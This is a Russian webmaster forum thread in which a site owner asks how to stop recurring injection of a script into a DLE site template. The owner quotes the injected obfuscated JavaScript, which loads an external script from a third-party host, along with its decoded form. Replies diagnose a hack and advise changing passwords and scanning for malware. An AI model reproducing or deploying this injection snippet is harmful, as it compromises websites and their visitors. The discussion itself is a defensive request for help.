X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Вирус перед счетчиков Li на DLE
CaHbka
CaHbka
Topic Starter сообщение 1.2.2012, 16:22; Ответить: CaHbka
Сообщение #1


Участник
***

Группа: User
Сообщений: 193
Регистрация: 5.9.2009
Из: С:\Земля\Украина\Кировоградская обл.\г.Светловодск
Поблагодарили: 40 раз
Репутация:   6  


Уже несколько раз удаляют такой код с сайта:

<script language="JavaScript">document.write(unescape("%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%27%4a%61%76%61%53%63%72%69%70%74%27%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%75%6e%69%31%34%2e%72%75%2f%77%70%68%65%61%64%65%72%2e%70%68%70%3f%69%3d%31%35%39%36%33%27%3e%3c%2f%73%63%72%69%70%74%3e"))</script>


После расшифровки:

<script language="JavaScript">document.write(unescape("<script language='JavaScript' src='http://uni14.ru/wpheader.php?i=15963'></script>"))</script>


Код всегда находиться выше счетчика от Liveinternet. Код на сайте появляеться примерно раз через 10 дней. Ставят код только в одном файле main.tpl основного шаблона, другие шабы не трогают.

Версия DLE 9.2.

Подскажите что это за хрень и как лечить?

P.S. Обновлять CMS не предлагайте.

Спасибо.


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BelCoder
BelCoder
сообщение 1.2.2012, 16:35; Ответить: BelCoder
Сообщение #2


клоновод
**


Группа: Banned
Сообщений: 63
Регистрация: 22.5.2011
Поблагодарили: 26 раз
Репутация:   6  


Похоже на накрутку показа тизерных блоков, скорее всего была установлена не очень чистая версия движка, или же просто взлом

Если код ставится сразу перед счетчиком LI, то попробуйте удалить "<!--LiveInternet counter-->", возможно он на эту часть кода ориентируется.
Хотя если взлом и ручная простановка кода, тогда поработайте над безопасностью

Сообщение отредактировал BelCoder - 1.2.2012, 16:36


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
CaHbka
CaHbka
Topic Starter сообщение 1.2.2012, 16:38; Ответить: CaHbka
Сообщение #3


Участник
***

Группа: User
Сообщений: 193
Регистрация: 5.9.2009
Из: С:\Земля\Украина\Кировоградская обл.\г.Светловодск
Поблагодарили: 40 раз
Репутация:   6  


Такая же версия висит ещё на 4 сайтах на этом хостинге, но ломают только этот.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fobos
fobos
сообщение 1.2.2012, 16:49; Ответить: fobos
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 341
Регистрация: 22.2.2008
Из: СССР
Поблагодарили: 56 раз
Репутация:   7  


Типичный вредоносный код, внедряется в основной файл шаблона или помещается файл с кодом в папку (обычно images) и начинает заражать все файла.
Сайт был взломан или украдены пароли к сайту/ftp.

Сообщение отредактировал fobos - 1.2.2012, 16:51


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
House
House
сообщение 1.2.2012, 17:26; Ответить: House
Сообщение #5


Завсегдатай
*****


Группа: Banned
Сообщений: 628
Регистрация: 2.11.2011
Из: Саранск
Поблагодарили: 154 раза
Репутация:   19  


Обычный код тизерки smile.gif
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
CaHbka
CaHbka
Topic Starter сообщение 1.2.2012, 17:30; Ответить: CaHbka
Сообщение #6


Участник
***

Группа: User
Сообщений: 193
Регистрация: 5.9.2009
Из: С:\Земля\Украина\Кировоградская обл.\г.Светловодск
Поблагодарили: 40 раз
Репутация:   6  


Обычный код тизерки smile.gif


Только яндекс теперь ругаеться на сайт =(


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
bobur
bobur
сообщение 1.2.2012, 18:53; Ответить: bobur
Сообщение #7


Мастер Datalife Engine
******

Группа: Active User
Сообщений: 1421
Регистрация: 12.11.2009
Из: Планета Земля
Поблагодарили: 195 раз
Репутация:   59  


Могу за оплату найти и обезвредить...


--------------------
Мастер по Datalife Engine на ТУТ. ICQ:359803651.

CверхБыстрые VPS/VDS по системе Все включено! 60% скидка. Купон:60OFFAVPS
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nick777
nick777
сообщение 1.2.2012, 20:28; Ответить: nick777
Сообщение #8


Завсегдатай
*****

Группа: Active User
Сообщений: 653
Регистрация: 19.9.2010
Из: Россия, город Москва Кто: Веб-мастер/блоггер Блог url: partnerki-runeta.ru
Поблагодарили: 105 раз
Репутация:   11  


* Качаете отсюда утилиты по поиску вирусов: comss.ru.
* Проверяете компьютер с помощью утилит и своего антивируса
* Настраиваете антивирус на режим повышенной безопасности
* Меняете все пароли на всех аккаунтах, ftp и т.д.
* PROFIT!

P.S. Ну и, естественно, проверяете все сайты на вирусы и удаляете код вируса.

Сообщение отредактировал nick777 - 1.2.2012, 20:30


--------------------
На мобильной рекламе можно зарабатывать по-белому здесь!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
asAlbert
asAlbert
сообщение 1.2.2012, 21:05; Ответить: asAlbert
Сообщение #9


http://http://http://http
*****

Группа: Active User
Сообщений: 992
Регистрация: 15.12.2009
Из: /dev/null
Поблагодарили: 221 раз
Репутация:   62  


(nick777 @ 1.2.2012, 20:28) *
* Качаете отсюда утилиты по поиску вирусов: comss.ru.
* Проверяете компьютер с помощью утилит и своего антивируса
* Настраиваете антивирус на режим повышенной безопасности
* Меняете все пароли на всех аккаунтах, ftp и т.д.
* PROFIT!

P.S. Ну и, естественно, проверяете все сайты на вирусы и удаляете код вируса.


Выше было сказано, что похекали только один сайт из нескольких. Если версия CMS везде одинаково, то скорее всего уязвимость в плагине, либо пробрутили пароль в админку.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
CaHbka
CaHbka
Topic Starter сообщение 1.2.2012, 21:20; Ответить: CaHbka
Сообщение #10


Участник
***

Группа: User
Сообщений: 193
Регистрация: 5.9.2009
Из: С:\Земля\Украина\Кировоградская обл.\г.Светловодск
Поблагодарили: 40 раз
Репутация:   6  


Пароли поменял, на файлы шаблоны установил CHMOD заприщающий редактировать файлы через Админку.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Услуги по CMS Wordpress, DLE, Joomla!. Правки, ремонт, настройка.
Редактирование и правки. Низкие цены.
143 contex1 65211 Сегодня, 9:07
автор: contex1
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
278 kaartes 102899 14.12.2017, 10:55
автор: kukla
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
15 Nell 1174 13.12.2017, 23:36
автор: Nell
Горячая тема (нет новых ответов) Дешевый трафик на сайт, накрутка счетчиков
накрутка статистики (бот трафик)
145 StarWareznik 68958 9.12.2017, 22:02
автор: StarWareznik
Открытая тема (нет новых ответов) Требуется так сказать оптимизация шаблона DLE
5 Deadman_n 421 2.12.2017, 13:24
автор: Deadman_n


 



RSS Текстовая версия Сейчас: 17.12.2017, 20:10
Дизайн